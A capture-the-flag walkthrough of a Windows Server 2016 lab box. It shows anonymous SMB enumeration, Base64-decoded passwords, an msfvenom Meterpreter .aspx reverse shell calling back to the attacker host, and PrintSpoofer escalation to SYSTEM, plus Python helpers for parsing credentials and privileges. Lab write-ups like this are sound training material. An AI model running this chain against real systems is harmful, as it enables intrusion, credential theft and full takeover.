First, we will begin with our usual nmap scan to see where we can start looking.
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-22 04:18 CET
Nmap scan report for 10.10.218.69
Host is up (0.093s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open  ms-wbt-server?
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2021-12-21T03:13:52
|_Not valid after:  2022-06-22T03:13:52
| rdp-ntlm-info:
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2021-12-22T03:20:37+00:00
|_ssl-date: 2021-12-22T03:21:15+00:00; 0s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h36m00s, deviation: 3h34m42s, median: 0s
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2021-12-22T03:20:37
|_  start_date: 2021-12-22T03:14:38
| smb-os-discovery:
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Relevant
|   NetBIOS computer name: RELEVANT
|   Workgroup: WORKGROUP
|_  System time: 2021-12-21T19:20:39-08:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.73 seconds
From this we see an IIS 10.0 web server on port 80, RDP on 3389 and SMB on 445, all on Windows Server 2016 (build 14393). Nothing exotic on the web side.

The more interesting detail is SMB. The smb-security-mode script got in as guest (account_used: guest) and signing is not required, so the server accepts a null/guest session and we can enumerate shares without credentials. Listing them anonymously (for example smbclient -N -L //10.10.218.69) shows a non-default share, nt4wrksv, next to the usual administrative ones:
	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	nt4wrksv        Disk
Now we just have to connect to nt4wrksv and see what it holds. It accepts an empty password, which confirms the guest access nmap reported.
Password for [WORKGROUP\max]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 25 23:46:04 2020
  ..                                  D        0  Sat Jul 25 23:46:04 2020
  passwords.txt                       A       98  Sat Jul 25 17:15:33 2020

		7735807 blocks of size 4096. 4945463 blocks available
smb: \> cat passwords.txt
cat: command not found
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
Looks like we are lucky: the share holds a small passwords.txt. smbclient has no cat command, so we pull the file down with get and read it locally. Its contents:
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
These are not encrypted, just Base64-encoded (the restricted alphabet and the trailing == padding give it away), so all we need to do is decode them. I used an online Base64 decoder for that, but base64 -d on the command line does the same. After decoding both lines we are left with two users and their passwords in the form "User - Password":

Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$
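Decoding two lines by hand is fine, but the same file format turns up often enough that it is worth a small, forgiving parser. The following is an added example written for this post, not code from the original writeup; it embeds the passwords.txt contents shown above as a constructed string, tolerates stripped padding, skips the header line and anything that is not Base64, and splits each decoded line on the " - " separator that this file uses (the separator is a parameter, since other dumps use ":" or a tab).

```python
import base64
import binascii
from typing import List, Optional, Tuple

# Constructed sample input for this example: the passwords.txt contents
# shown above (header line plus the two Base64 lines), not read from the share.
PASSWORDS_TXT = """[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
"""


def decode_b64_lenient(token: str) -> Optional[bytes]:
    """Decode one Base64 token, restoring '=' padding that was stripped.

    Returns None for anything that is not valid Base64 (header lines,
    comments, blank lines), so callers can skip it instead of crashing.
    """
    token = token.strip()
    if not token:
        return None
    padded = token + "=" * (-len(token) % 4)  # pad length up to a multiple of 4
    try:
        return base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None


def parse_encoded_credentials(text: str, sep: str = " - ") -> List[Tuple[str, str]]:
    """Decode every Base64 line and split it into (user, password) on the
    first occurrence of sep ('User - Password' is the layout this file uses).

    Lines that do not decode, are not UTF-8, are not printable, or lack the
    separator are skipped; passwords are kept verbatim, including spaces.
    """
    creds: List[Tuple[str, str]] = []
    for line in text.splitlines():
        raw = decode_b64_lenient(line)
        if raw is None:
            continue
        try:
            decoded = raw.decode("utf-8")
        except UnicodeDecodeError:
            continue
        if not decoded.isprintable():
            continue
        user, found, password = decoded.partition(sep)
        if not found or not user.strip() or not password:
            continue
        creds.append((user.strip(), password))
    return creds


if __name__ == "__main__":
    for user, password in parse_encoded_credentials(PASSWORDS_TXT):
        print(f"{user}:{password}")  # user:password, ready for a spray tool
```

Run it as-is and it prints the two user:password pairs; point parse_encoded_credentials at the contents of a real file to reuse it. The validate=True flag is what makes the header line fall through cleanly: b64decode would otherwise silently discard the non-alphabet characters and return garbage.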
Scanning a little more, I didn't find anywhere these credentials were accepted, so I kept digging.

The first scan only covered nmap's default top 1000 ports. Rerunning it with -p- (all 65535 TCP ports) turns up a second HTTP service on port 49663, and under it a directory with the same name as the share, nt4wrksv. If that directory is backed by the share's folder on disk, anything we put into the share gets served (and, for .aspx, compiled and executed) by IIS, so we can upload a reverse shell and trigger it just by requesting it. It is worth confirming the mapping before dropping a payload: put a harmless test.txt into the share and request http://10.10.218.69:49663/nt4wrksv/test.txt; if it comes back, the write path and the execution path are the same folder.

So first, let's generate the reverse shell payload with msfvenom. The exact command isn't shown; the output below is consistent with a 64-bit Windows Meterpreter reverse TCP payload written out as an .aspx page, i.e. something like msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.8.208.63 LPORT=1337 -f aspx -o 1337.aspx (the payload name is my assumption, the LHOST and LPORT are the ones the listener uses below).
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 200262 bytes
Final size of aspx file: 1010404 bytes
Saved as: 1337.aspx
Perfect. Before uploading that to the SMB share we need something for it to call back to, so we start exploit/multi/handler in Metasploit. Two things have to line up: LHOST and LPORT must match the values baked into the payload, and the handler's PAYLOAD must match what msfvenom generated. The default generic/shell_reverse_tcp shown below only suits a plain shell; for a Meterpreter .aspx, set PAYLOAD to the same windows/x64/meterpreter payload, otherwise the session will not be a Meterpreter one.
       =[ metasploit v6.1.8-dev                          ]
+ -- --=[ 2167 exploits - 1149 auxiliary - 397 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Writing a custom module? After editing your module, why not try the reload command

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.8.208.63
LHOST => 10.8.208.63
msf6 exploit(multi/handler) > set LPORT 1337
LPORT => 1337
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.8.208.63:1337
Now we can finally connect to the share, upload the payload with put 1337.aspx, and trigger it by requesting http://<target>:49663/nt4wrksv/1337.aspx in a browser or with curl. IIS compiles and runs the page, the payload connects back to the handler, and we get a Meterpreter session. Meterpreter has no whoami built in, so we drop into a cmd shell to check who we are and which privileges we hold.
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.8.208.63:1337
[*] Meterpreter session 7 opened (10.8.208.63:1337 -> 10.10.232.253:49773) at 2021-12-22 05:24:46 +0100

meterpreter > whoami /priv
[-] Unknown command: whoami
meterpreter > shell
Process 2284 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

c:\windows\system32\inetsrv>
We are inside the server as the IIS application pool identity, iis apppool\defaultapppool, a low-privileged service account. The user flag is readable from here at C:\Users\Bob\Desktop\user.txt, so grab it and let's move on to getting SYSTEM (the Windows equivalent of root).
Taking a closer look at the privileges we hold, SeImpersonatePrivilege stands out. It is granted by default to service accounts, IIS application pool identities included, and it lets a process impersonate any client that authenticates to it. That is exactly what PrintSpoofer (by itm4n) abuses: it creates a named pipe, coerces the Print Spooler service, which runs as SYSTEM, into connecting to that pipe, impersonates the resulting SYSTEM token and spawns a new process with it. The only requirements are that the privilege is present (whoami /priv shows it Enabled here) and that the Spooler service is running, which it is by default on Windows Server 2016. Note also that SeAssignPrimaryTokenPrivilege shows as Disabled rather than absent: a disabled privilege is still held by the token and can be switched on by the process, and the Potato family of tools works with either of these two privileges.
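Reading a whoami /priv table by eye works for seven rows, but on a real host with dozens of privileges it is easy to miss one. The following is an added example written for this post, not part of the original writeup or of PrintSpoofer: it parses the whoami /priv output shown above (embedded here as a constructed string) and flags every privilege that is well known to be abusable for escalation, reporting "held but disabled" rather than ignoring disabled ones. The lookup table of abusable privileges and technique families is assembled for this example and can be extended.

```python
from typing import Dict, List, NamedTuple

# Constructed sample input: the `whoami /priv` table from the shell above,
# pasted as a string rather than captured from a live host.
WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges well known to be abusable for local privilege escalation and the
# technique family each one enables. Table assembled for this example.
ABUSABLE_PRIVILEGES: Dict[str, str] = {
    "SeImpersonatePrivilege": "token impersonation (PrintSpoofer / Potato family)",
    "SeAssignPrimaryTokenPrivilege": "token impersonation (PrintSpoofer / Potato family)",
    "SeBackupPrivilege": "read any file, e.g. dump the SAM and SYSTEM hives",
    "SeRestorePrivilege": "write any file, e.g. replace a service binary",
    "SeDebugPrivilege": "open any process, e.g. dump LSASS or inject into SYSTEM",
    "SeTakeOwnershipPrivilege": "take ownership of any object, then grant yourself access",
    "SeLoadDriverPrivilege": "load a kernel driver",
    "SeTcbPrivilege": "act as part of the OS, create arbitrary tokens",
    "SeCreateTokenPrivilege": "create arbitrary tokens",
    "SeManageVolumePrivilege": "raw volume access",
}


class Privilege(NamedTuple):
    name: str
    description: str
    enabled: bool


def parse_whoami_priv(output: str) -> List[Privilege]:
    """Parse the table printed by `whoami /priv`.

    Each data row is `<SeName> <free-text description> <Enabled|Disabled>`:
    the first token is the privilege name, the last is the state, everything
    in between is the description. Header, rule and blank lines are skipped.
    'Disabled' still means the token holds the privilege; it can be enabled
    with AdjustTokenPrivileges at any time, so it is not dropped here.
    """
    privs: List[Privilege] = []
    for line in output.splitlines():
        parts = line.split()
        if len(parts) < 2 or not parts[0].startswith("Se"):
            continue
        state = parts[-1]
        if state not in ("Enabled", "Disabled"):
            continue
        privs.append(Privilege(parts[0], " ".join(parts[1:-1]), state == "Enabled"))
    return privs


def triage_privileges(privs: List[Privilege]) -> List[str]:
    """Return one finding per held privilege that appears in the abusable list,
    in the order whoami printed them."""
    findings: List[str] = []
    for p in privs:
        if p.name in ABUSABLE_PRIVILEGES:
            state = "enabled" if p.enabled else "held but disabled"
            findings.append(f"{p.name} ({state}): {ABUSABLE_PRIVILEGES[p.name]}")
    return findings


if __name__ == "__main__":
    for finding in triage_privileges(parse_whoami_priv(WHOAMI_PRIV)):
        print(finding)
```

On the sample above it reports SeAssignPrimaryTokenPrivilege as held but disabled and SeImpersonatePrivilege as enabled, both pointing at the impersonation family, which is the conclusion the next step acts on. To use it on another host, pipe the output of whoami /priv into parse_whoami_priv instead of the embedded string.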
First, let's get the PrintSpoofer binary from https://github.com/itm4n/PrintSpoofer (the 64-bit build, since this host is x64) and upload it to the SMB share the same way we uploaded the ASPX payload.
After that, from our reverse shell we change into the directory that backs the share on disk and run it. The -c flag gives the command to launch with the stolen SYSTEM token and -i keeps that process attached to the current console, so we get an interactive PowerShell rather than a detached window.
PrintSpoofer.exe -i -c powershell.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32>
Well, that's it: the new PowerShell runs as nt authority\system. Just go and grab the root flag at C:\Users\Administrator\Desktop\root.txt.
Hope you enjoyed it!